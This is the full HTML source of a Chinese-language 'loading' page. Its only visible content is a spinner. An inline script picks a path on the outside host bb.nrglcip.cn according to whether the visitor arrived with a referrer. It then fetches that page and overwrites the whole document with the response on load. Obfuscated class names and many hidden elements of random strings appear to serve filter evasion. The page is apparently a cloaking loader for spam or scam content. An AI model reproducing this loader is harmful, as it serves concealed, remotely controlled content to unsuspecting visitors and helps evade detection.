<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .we0YFscbJ1 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .we0YFscbJ1 .NLrjNp {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .we0YFscbJ1 .content {
            line-height: 50px;
            text-align: center
        }

        .we0YFscbJ1 .img {
            width: 100%
        }

        .we0YFscbJ1 .ytSQ9rquOlM {
            text-align: center
        }

        .we0YFscbJ1 .ytSQ9rquOlM span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .we0YFscbJ1 .ytSQ9rquOlM span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .we0YFscbJ1 .ytSQ9rquOlM span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .we0YFscbJ1 .ytSQ9rquOlM span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .we0YFscbJ1 .ytSQ9rquOlM span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .we0YFscbJ1 .ytSQ9rquOlM span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .we0YFscbJ1 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function pi4OCkvIWu(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Buzcj = pi4OCkvIWu('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Buzcj +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Buzcj +".html?a=share";
		}
		
        ScWLxLblW=url+"#"+new Date().getTime();
        ScWLxLblW && function() {
            $.get(ScWLxLblW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >h4r9YH0sZ2JgwgS6ncZZ3xVNvG8Q78nPNA3d25</b>
<img  src='' style='display:none'>
<span style='display:none'>vPGFkXsYZb2EEU</span>
<h1 style='display:none' >R1ZyiXzP0LUZDSPeIT1ki2iwe5CpwNFkqTZD5gCHw4NwJuuIUxEzuiGgdjWp</h1>
<img  src='' style='display:none'>
<b style='display:none' >h4r9YH0sZ2JgwgS6ncZZ3xVNvG8Q78nPNA3d25</b>
<b style='display:none' >h4r9YH0sZ2JgwgS6ncZZ3xVNvG8Q78nPNA3d25</b>
<li style='display:none' >RiDYn84rhHlYfvNgN95jZULFtBMJh6t8xJx2H1WbkbXd6rkTx9hgN11bDr</li>
<h1 style='display:none' >R1ZyiXzP0LUZDSPeIT1ki2iwe5CpwNFkqTZD5gCHw4NwJuuIUxEzuiGgdjWp</h1><div class="we0YFscbJ1">
    <div class="NLrjNp">
        <div class="ytSQ9rquOlM">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>LS5HKOc2xU8ckZD8Hzt43EZmVodybeM8PJ8OdK5oLdBNaiOOIUVpCHAfLGiLv3j</a>
<p  style='display:none'>RjBTZmtLYwvLyGySD8HlNo24S5GTXC4gW1Cx0PkEJqlIOpcDYfUxJfdlK3VvyYDHj9G3T1148rpntFrEX0H36wKj</p>
<div style='display:none'>GbigjPnUB2GZxEiocWXm9</div>
<div style='display:none'>GbigjPnUB2GZxEiocWXm9</div>
<ul style='display:none' >Gq9YL4oGqGgzJoQClVzq1wzej7jiTXMJ7KT3fBSeP0D0q3KycRYH4YiO9X689exytBN</ul>
<ul style='display:none' >Gq9YL4oGqGgzJoQClVzq1wzej7jiTXMJ7KT3fBSeP0D0q3KycRYH4YiO9X689exytBN</ul>
<div style='display:none'>GbigjPnUB2GZxEiocWXm9</div>
<li style='display:none' >hiZ7qZHZ6Jd5KYIr</li>
<span style='display:none'>T4pzvdf6LkftHwb1MvcbFj6YVzEq9RqwolG8bZJfiOT9KAUSJStDOeSIQsF8Rve</span></body>
</html>